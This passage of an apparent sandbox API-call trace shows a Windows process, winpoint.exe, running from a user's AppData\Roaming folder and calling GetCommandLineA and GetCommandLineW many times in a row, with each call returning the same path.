IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.641] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.641] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.641] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.641] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.641] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.641] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.641] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.641] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.641] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.641] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.641] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.641] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.641] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.641] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.641] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.641] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.641] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.641] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.641] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.641] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.641] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.641] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.641] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.641] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.641] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.641] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.641] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.641] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.641] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.641] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.641] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.641] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.641] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.641] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.641] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.641] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.641] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.641] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.641] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.641] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.641] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.641] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.642] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.642] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.642] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.642] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.642] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.642] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.642] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.642] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.644] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.645] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.645] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.645] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.645] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.645] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.645] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.645] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.645] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.645] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.645] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.645] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.645] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.645] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.645] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.645] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.645] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.645] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.645] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.645] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.645] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.645] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.645] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.645] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.645] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.645] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.646] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.646] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.646] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.646] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.646] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.646] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.646] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.648] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.648] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.648] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.648] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.648] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.648] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.648] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.648] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.648] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.648] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.648] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.648] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.648] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.648] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.648] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.648] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.648] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.648] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.648] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.648] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.648] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.648] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.648] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.648] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.648] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.648] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.648] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.648] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.648] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.648] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.648] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.648] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.648] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.648] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.648] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.649] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.649] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.649] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.649] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.649] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.649] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.649] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.649] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.649] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.649] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.649] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.649] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.649] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.649] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.649] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.649] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.649] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.649] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.649] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.649] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.649] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.649] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.649] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.649] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.649] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.649] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.649] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.649] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.649] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.649] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.649] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.649] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.649] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.649] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.649] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.649] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.649] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.650] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.650] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.650] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.650] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.650] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.650] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.650] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.650] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.650] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.650] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.650] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.650] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.650] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.650] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.650] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.650] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.650] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.650] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.650] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.650] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.650] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.650] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.650] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.650] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.650] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.650] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.650] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.650] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.650] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.650] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.650] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.650] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.650] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.650] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.650] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.650] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.650] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.650] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.650] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.650] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.650] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.650] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.650] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.650] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.651] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.651] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.651] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.651] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.651] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.651] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.651] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.651] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.651] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.651] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.651] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.651] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.651] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.651] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.651] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.651] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.651] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.651] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.651] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.651] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.651] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.651] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.651] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.651] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.651] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.651] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.651] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.651] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.651] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.651] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.651] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.651] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.651] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.651] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.651] GetCommandLineW () returned="\"C:\\Users\\aDU0VK 